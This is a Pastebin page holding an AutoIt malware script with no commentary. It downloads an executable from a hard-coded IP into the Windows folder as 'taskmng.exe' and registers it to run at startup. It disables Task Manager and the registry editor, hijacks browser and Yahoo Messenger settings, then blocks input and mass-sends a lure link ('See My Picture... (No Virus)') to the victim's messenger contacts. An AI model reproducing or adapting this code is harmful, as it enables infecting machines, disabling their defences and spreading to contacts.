Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $website = "http://72.232.123.170/~love/"
- $website2 = "Http://dasdasdasd"
- If Not FileExists(@WindowsDir & "\taskmng.exe") Then
- InetGet ($website & "/xlove.exe", @WindowsDir & "\taskmng.exe", 0, 1)
- Sleep(500)
- EndIf
- RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run", "BkavFw", "REG_SZ","C:\WINDOWS\taskmng.exe")
- RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run", "Task Manager", "REG_SZ","C:\WINDOWS\taskmng.exe")
- RegWrite("HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1")
- RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
- RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
- RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main", "Start Page", "REG_SZ", $website2)
- RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_buzz", "content url", "REG_SZ", $website2)
- RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_Launchcast", "content url", "REG_SZ", $website2)
- RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\taskmng.exe")
- RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main", "Window Title", "REG_SZ", "wWw.LoveNovel.Kiss.To")
- $title = WinGetTitle("Yahoo! Messenger")
- $wincheck = WinExists ($title)
- ClipPut("http://adasd <=== See My Picture :X :X So Cute !!! (No Virus)")
- if $wincheck = 1 then
- BlockInput (1)
- WinActivate($title)
- send("!A")
- send("M")
- sleep(600)
- send("{DOWN}")
- send("{SHIFTDOWN}")
- send("{DOWN 70}")
- send("{enter}")
- send("{LSHIFT}")
- send("^v {ENTER}")
- BlockInput (0)
- endif
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement